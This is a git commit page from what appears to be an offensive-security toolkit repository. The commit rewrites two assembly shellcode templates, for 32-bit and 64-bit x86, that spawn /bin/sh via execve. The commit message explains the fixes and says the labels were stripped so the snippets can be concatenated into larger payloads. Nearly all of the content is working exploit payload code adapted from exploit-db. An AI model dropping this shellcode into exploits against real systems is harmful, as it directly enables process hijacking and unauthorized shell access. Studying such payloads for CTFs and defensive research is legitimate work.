diff options
| author | Malfurious <m@lfurio.us> | 2023-01-15 08:06:42 -0500 |
|---|---|---|
| committer | Malfurious <m@lfurio.us> | 2023-01-15 10:12:48 -0500 |
| commit | f21e743212f02dbfb560fa74d983a7e156722d11 (patch) | |
| tree | 920fc58ea7ec7896f8f4cf9ed48595785375b526 | |
| parent | ad106276e2935085f9201ffa65423032f8fcff6b (diff) | |
| download | lib-des-gnux-f21e743212f02dbfb560fa74d983a7e156722d11.tar.gz lib-des-gnux-f21e743212f02dbfb560fa74d983a7e156722d11.zip | |
shellcode: Update /bin/sh shellcodes
The shell-spawning shellcodes are rewritten to address the following
concerns:
- The array parameters to execve are now set properly, to valid
arrays on the stack, instead of NULL pointers.
- The cdq instruction is no longer used to sign-extend the rax
register, since it has not been producing the expected results in
gdb.
- Labels, sections, and other file metadata are removed in order to
support concatenation of shellcode samples to make more complex
code.
Signed-off-by: Malfurious <m@lfurio.us>
| -rw-r--r-- | templates/shellcode/examples/shell32.asm | 29 | ||||
| -rw-r--r-- | templates/shellcode/examples/shell64.asm | 36 |
2 files changed, 37 insertions, 28 deletions
diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm index 5ff2e12..6238469 100644 --- a/templates/shellcode/examples/shell32.asm +++ b/templates/shellcode/examples/shell32.asm @@ -1,15 +1,16 @@ -[SECTION .text] -global _start +; Originally based on https://www.exploit-db.com/shellcodes/46809 +; See shell64.asm for more details. -; https://www.exploit-db.com/shellcodes/46809 - -_start: - xor ecx, ecx - xor edx, edx - push 0xb - pop eax - push ecx - push 0x68732f2f - push 0x6e69622f - mov ebx, esp - int 0x80 +; execve("/bin/sh", ["/bin/sh"], []) +xor eax, eax +xor ecx, ecx +push ecx +push 0x68732f2f +push 0x6e69622f +mov ebx, esp +push ecx +mov edx, esp +push ebx +mov ecx, esp +mov al, 11 +int 0x80 diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm index 2353b6f..3812c33 100644 --- a/templates/shellcode/examples/shell64.asm +++ b/templates/shellcode/examples/shell64.asm @@ -1,16 +1,24 @@ -[SECTION .text] -global _start +; Originally based on https://www.exploit-db.com/shellcodes/47008 -; https://www.exploit-db.com/shellcodes/47008 +; stack layout +; +; ┏━━━━━━━━━━━━━━┓ +; ┃ v +; [ argv0, NULL ] "/bin//sh" NULL +; ^ ^ ^ +; ┃ ┃ ┃ +; argv envp filename -_start: - xor rsi, rsi - xor rdx, rdx - push rsi - mov rdi, 0x68732f2f6e69622f - push rdi - push rsp - pop rdi - mov al, 0x3b - cdq - syscall +; execve("/bin/sh", ["/bin/sh"], []) +xor rax, rax +xor rsi, rsi +mov rdi, 0x68732f2f6e69622f +push rsi +push rdi +mov rdi, rsp +push rsi +mov rdx, rsp +push rdi +mov rsi, rsp +mov al, 59 +syscall |